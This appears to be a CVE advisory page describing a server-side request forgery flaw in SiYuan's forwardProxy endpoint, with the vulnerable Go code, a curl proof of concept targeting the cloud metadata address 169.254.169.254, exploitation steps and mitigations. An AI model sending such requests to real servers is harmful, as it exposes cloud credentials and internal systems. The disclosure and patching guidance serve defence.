SiYuan, SSRF, N/A (Critical)

By /

Listen to this Post

The vulnerability resides in the `/api/network/forwardProxy` endpoint of SiYuan, which allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user‑controlled URL via a JSON payload and performs an HTTP request using the `request.Send()` function. The code only validates the URL format with `url.ParseRequestURI()` but does not restrict the destination IP or hostname. This lack of validation enables an attacker to force the server to send requests to internal networks, localhost, or cloud metadata services (e.g., 169.254.169.254). The server then returns the full response body and headers to the attacker, effectively turning the server into an open proxy. The affected code is found in `/kernel/api/network.go` (lines 153‑317). An attacker first authenticates to obtain a valid `siyuan` cookie, then sends a POST request to the endpoint with a `url` field pointing to an internal or metadata resource. The server blindly forwards the request and leaks the response. This SSRF can be used for internal network reconnaissance, stealing cloud IAM credentials, exfiltrating data, and bypassing firewall rules by leveraging the server’s trusted IP.

dailycve form

Platform: SiYuan
Version: All versions
Vulnerability: SSRF via forwardProxy
Severity: Critical
date: Unknown

Prediction: Pending

What Undercode Say:

Analytics

Vulnerable code snippet (network.go lines 153‑317):

func forwardProxy(c gin.Context) {
ret := gulu.Ret.NewResult()
defer c.JSON(http.StatusOK, ret)
arg, ok := util.JsonArg(c, ret)
if !ok { return }
destURL := arg["url"].(string)
// Only validates URL format, not destination
if _, e := url.ParseRequestURI(destURL); nil != e {
ret.Code = -1
ret.Msg = "invalid [bash]"
return
}
// HTTP request made to user-controlled URL
resp, err := request.Send(method, destURL)
// Full response body returned to user
bodyData, err := io.ReadAll(resp.Body)
// ...
ret.Data = data // Contains full response body
}

Exploitation PoC using curl:

curl -X POST http://<TARGET>/api/network/forwardProxy \
-H "Cookie: siyuan=<AUTH_COOKIE>" \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/metadata/v1/","method":"GET","headers":[],"payload":"","timeout":7000}'

Exploit

1. Authenticate and capture a valid `siyuan` cookie.

  1. Send a POST request to `/api/network/forwardProxy` with a JSON body containing the target internal URL (e.g., cloud metadata service, internal server).
  2. The server returns the response body, exposing sensitive data.

Protection from this CVE

  • Implement strict allow‑list validation for URLs (only permit external, trusted domains).
  • Block requests to private IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and 169.254.169.254/32).
  • Use a dedicated HTTP client with disabled redirects and restricted network interfaces.
  • Apply the principle of least privilege: limit which users can access the endpoint.

Impact

  • Internal network reconnaissance and service discovery.
  • Theft of cloud IAM credentials from metadata services.
  • Data exfiltration from internal systems.
  • Bypass of firewall rules via trusted server origin.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top